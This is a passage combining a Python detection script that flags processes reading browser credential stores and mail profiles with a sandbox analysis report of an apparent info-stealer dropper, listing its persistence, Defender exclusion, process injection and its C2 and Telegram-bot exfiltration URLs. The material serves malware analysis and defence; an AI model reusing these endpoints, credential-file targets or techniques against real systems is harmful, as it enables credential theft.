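    r"Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History",
    r"Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies",
    r"Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data",
    r"Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data",
    r"Source: C:\Users\user\Desktop\rShipmentDocuments.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior",
    r"Source: C:\Users\user\Desktop\rShipmentDocuments.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676",
    r"Source: C:\Users\user\Desktop\rShipmentDocuments.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior",
]

# One behaviour row: source process, action, target. Tolerates an optional
# " | " cell separator and strips the "VolumeInformation" and
# "Jump to behavior" trailers that the export glues onto the target.
ROW_RE = re.compile(
    r"^Source:\s*(?P<source>.+?\.exe)\s*\|?\s*"
    r"(?P<action>File opened|Key opened|Key value queried|Queries volume information):\s*"
    r"(?P<target>.+?)(?:\s*\|?\s*VolumeInformation)?(?:Jump to behavior)?$"
)

# Assumed rule table (author's choice): (tag, predicate over (action, target)).
RULES = (
    ("browser_credentials", lambda a, t: a == "File opened"
        and t.endswith(("\\Login Data", "\\Web Data"))),
    ("browser_session", lambda a, t: a == "File opened"
        and t.endswith(("\\Cookies", "\\History", "\\Top Sites"))),
    ("mail_profile", lambda a, t: "PostboxApp\\Profiles" in t
        or "Windows Messaging Subsystem\\Profiles\\Outlook" in t),
    ("host_fingerprint", lambda a, t: a == "Key value queried"
        and t.endswith("MachineGuid")),
)


def parse_row(row):
    """Return (source, action, target) for a behaviour row, or None."""
    m = ROW_RE.match(row.strip())
    if m is None:
        return None
    return m.group("source"), m.group("action"), m.group("target")


def classify(action, target):
    """Set of tags whose predicate matches this (action, target) pair."""
    return {tag for tag, pred in RULES if pred(action, target)}


def triage(rows):
    """Map each source process to the union of tags its rows triggered."""
    hits = defaultdict(set)
    for row in rows:
        parsed = parse_row(row)
        if parsed is None:
            continue  # unrelated or unparsable row; ignore
        source, action, target = parsed
        hits[source] |= classify(action, target)
    return dict(hits)


def stealer_verdict(hits):
    """Processes that both read browser credential stores and probe mail
    profiles: the combination this report shows for ZOlmYtPdlO.exe."""
    wanted = {"browser_credentials", "mail_profile"}
    return {proc for proc, tags in hits.items() if wanted <= tags}


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    for proc, tags in sorted(result.items()):
        print(f"{proc}: {sorted(tags)}")
    print("stealer candidates:", sorted(stealer_verdict(result)))
```

Only ZOlmYtPdlO.exe meets the stealer combination on the sample rows; rShipmentDocuments.exe is tagged for mail-profile probing and host fingerprinting only, and the powershell.exe volume query carries no tag. In a real hunt the same predicates can be applied to endpoint file-open and registry telemetry, with the source path check swapped for the image path your sensor reports.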
Source: Yara match | File source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ZOlmYtPdlO.exe PID: 8136, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match, file source: 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: ZOlmYtPdlO.exe PID: 8136, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the signature count shown in the matrix for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Scheduled Task/Job; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 111 Process Injection; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 111 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 File and Directory Discovery; 13 System Information Discovery; 1 Query Registry; 11 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Web Service; 3 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 3 Non-Application Layer Protocol; 24 Application Layer Protocol; Commonly Used Port; Application Layer Protocol
Exfiltration: 1 Exfiltration Over Alternative Protocol; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1531471 | Sample: rShipmentDocuments.exe | Startdate: 11/10/2024 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP: reallyfreegeoip.org; api.telegram.org; 2 other IPs or domains
  Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
  reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
  api.telegram.org: Uses the Telegram API (likely for C&C communication)
  Started: rShipmentDocuments.exe (7); ZOlmYtPdlO.exe

rShipmentDocuments.exe (7)
  Dropped: C:\Users\user\AppData\...\ZOlmYtPdlO.exe (PE32); C:\Users\...\ZOlmYtPdlO.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp44A0.tmp (XML); C:\Users\user\...\rShipmentDocuments.exe.log (ASCII)
  Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender
  Started: rShipmentDocuments.exe (15, 2); powershell.exe (23); powershell.exe (23); 2 other processes

ZOlmYtPdlO.exe
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
  Started: ZOlmYtPdlO.exe; schtasks.exe; ZOlmYtPdlO.exe; ZOlmYtPdlO.exe

rShipmentDocuments.exe (15, 2), child of rShipmentDocuments.exe
  DNS/IP: api.telegram.org 149.154.167.220, 443, 49767, 49773 TELEGRAMRU United Kingdom; 185.230.141.85, 21, 49203, 49204 HostingvpsvilleruRU Russian Federation; 2 other IPs or domains

powershell.exe (23), first instance
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe; WmiPrvSE.exe

powershell.exe (23), second instance
  Started: conhost.exe

ZOlmYtPdlO.exe, child of ZOlmYtPdlO.exe
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

schtasks.exe
  Started: conhost.exe

2 other processes
  Started: conhost.exe

Source | Detection | Scanner | Label | Link
rShipmentDocuments.exe | 38% | Virustotal | | Browse
rShipmentDocuments.exe | 29% | ReversingLabs | Win32.Trojan.Generic |
rShipmentDocuments.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | 29% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | 38% | Virustotal | | Browse
                No Antivirus matches
Source | Detection | Scanner | Label | Link
reallyfreegeoip.org | 0% | Virustotal | | Browse
api.telegram.org | 2% | Virustotal | | Browse
checkip.dyndns.com | 0% | Virustotal | | Browse
checkip.dyndns.org | 0% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://www.fontbureau.com/designersG | 0% | URL Reputation | safe |
http://www.fontbureau.com/designers/? | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://www.fontbureau.com/designers? | 0% | URL Reputation | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
http://www.fontbureau.com/designers | 0% | URL Reputation | safe |
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | 0% | URL Reputation | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://checkip.dyndns.org/ | 0% | URL Reputation | safe |
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | 0% | URL Reputation | safe |
http://checkip.dyndns.org/q | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.fonts.com | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe |
http://www.fontbureau.com | 0% | URL Reputation | safe |
http://checkip.dyndns.org | 0% | URL Reputation | safe |
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | 0% | URL Reputation | safe |
https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.fontbureau.com/designers/cabarga.htmlN | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://www.fontbureau.com/designers/frere-user.html | 0% | URL Reputation | safe |
https://reallyfreegeoip.org/xml/8.46.123.33$ | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
https://reallyfreegeoip.org | 0% | URL Reputation | safe |
http://www.fontbureau.com/designers8 | 0% | URL Reputation | safe |
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | 0% | URL Reputation | safe |
https://api.telegram.org | 1% | Virustotal | | Browse
http://varders.kozow.com:8081 | 15% | Virustotal | | Browse
https://www.office.com/lB | 0% | Virustotal | | Browse
https://chrome.google.com/webstore?hl=en | 0% | Virustotal | | Browse
https://www.office.com/ | 0% | Virustotal | | Browse
https://www.office.com/p | 0% | Virustotal | | Browse
http://www.apache.org/licenses/LICENSE-2.0 | 0% | Virustotal | | Browse
https://api.telegram.org/bot/sendMessage?chat_id=&text= | 2% | Virustotal | | Browse
http://aborters.duckdns.org:8081 | 14% | Virustotal | | Browse
http://51.38.247.67:8081/_send_.php?L | 7% | Virustotal | | Browse
https://api.telegram.org/bot | 4% | Virustotal | | Browse
http://anotherarmy.dns.army:8081 | 18% | Virustotal | | Browse
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | 7% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 188.114.96.3 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
checkip.dyndns.com | 132.226.247.73 | true | false | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:30:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:40:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | unknown
https://reallyfreegeoip.org/xml/8.46.123.33 | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/bThe | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org/bot | rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.fontbureau.com/designers? | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.office.com/lB | rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003251000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://chrome.google.com/webstore?hl=enp | ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003216000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.tiro.com | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E96000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D67000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042E6000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000041B7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004334000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004409000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004190000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004142000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://chrome.google.com/webstore?hl=en | ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003225000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://varders.kozow.com:8081 | rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a | rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.sajatypeworks.com | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.office.com/p | ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003247000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D42000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004192000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000043E4000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.000000000411D000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org/q | rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://chrome.google.com/webstore?hl=enlB | rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003220000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.galapagosdesign.com/DPlease | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sandoll.co.kr | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | rShipmentDocuments.exe, 00000000.00000002.1728733569.0000000003327000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1765638038.0000000002867000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000000.00000002.1732739844.0000000005DA4000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/ | rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030B2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.office.com/ | ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003256000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003247000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0 | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.fontbureau.com | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org | rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
